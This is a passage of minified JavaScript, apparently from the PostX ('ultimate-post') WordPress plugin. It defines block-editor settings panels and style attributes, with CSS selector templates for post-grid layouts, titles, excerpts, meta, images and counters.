Limit","ultimate-post")}}],store:t,hrIdx:[6,9]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),("layout4"===l||"layout5"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,include:[{position:3,data:{type:"dimension",key:"lgInnerPadding",label:__("Large Content Padding","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],exclude:["contenWraptWidth","contenWraptHeight"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",include:[{position:1,data:{type:"select",key:"paginationType",pro:!0,label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:0,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor",{data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({include:[{data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:[{data:{type:"color",key:"excerptBigColor",label:__("Large Excerpt Color","ultimate-post")}}],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({include:[{position:0,data:{type:"toggle",key:"excerptShow",label:__("Large Item Excerpt","ultimate-post")}},{position:1,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"range",key:"smallExcerptLimit",min:0,max:500,step:1,help:"Excerpt Limit from Post Content.",label:__("Small Excerpt Limit","ultimate-post")}}],exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],incStyle:[{position:4,data:{type:"color",key:"LargeMetaColor",label:__("Large Post Meta Color","ultimate-post")}},{position:5,data:{type:"color",key:"LgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},16128:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-post-module2 { margin: 0 -{{columnGridGap}};}    \n          {{ULTP}} .ultp-block-post-module2 .ultp-big-post-module2,    \n          {{ULTP}} .ultp-block-post-module2 .ultp-small-post-module2 { padding: 0 {{columnGridGap}};}    \n          {{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},largeHeight:{type:"object",default:{lg:"450",unit:"px"},style:[{selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content-wrap .ultp-block-image img {width: 100%; object-fit: cover; height: {{largeHeight}};}"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-item:first-child .ultp-block-title,    \n          {{ULTP}} .ultp-big-post-module2 .ultp-block-item:first-child .ultp-block-title a"}]},lgTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content .ultp-block-title a { color: {{lgTitleColor}} !important }"}]},lgTitleHoverColor:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content .ultp-block-title a:hover { color: {{lgTitleHoverColor}} !important }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item .ultp-block-title,   \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:5,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}]}]},imgWidth:{type:"object",default:{lg:"80",sm:"65",xs:"",ulg:"px",usm:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image img {height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image img { object-fit: {{imageScale}}; }"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-image,   \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-image,   \n          {{ULTP}} .ultp-block-image img,   \n          {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:before,   \n          {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image img,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:before,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:after{ border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module2 .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-small-post-module2  .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module2  .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 span.ultp-block-meta-element:hover ,  \n          {{ULTP}} .ultp-block-items-wrap .ultp-small-post-module2 span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}!important; }  \n          {{ULTP}} .ultp-small-post-module2 span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},LargeMetaColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element { color: {{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element svg { color: {{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-block-items-wrap .ultp-big-post-module2 span.ultp-block-meta-element a { color: {{LargeMetaColor}} !important; }\n          {{ULTP}} .ultp-big-post-module2 .ultp-block-meta-dot span:after { background:{{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:after { color:{{LargeMetaColor}} !important; }"}]},LgMetaHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:hover svg { color: {{LgMetaHoverColor}} !important; }  \n          {{ULTP}} .ultp-block-items-wrap .ultp-big-post-module2 span.ultp-block-meta-element a:hover { color: {{LgMetaHoverColor}} !important; }  \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:hover { color: {{LgMetaHoverColor}} !important; }"}]},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},smallExcerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"showSmallExcerpt",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-excerpt,    \n        {{ULTP}} .ultp-small-post-module2 .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptBigColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-excerpt,                     \n        {{ULTP}} .ultp-big-post-module2 .ultp-block-excerpt p { color:{{excerptBigColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-excerpt,                     \n        {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { width:{{counterWidth}}px; 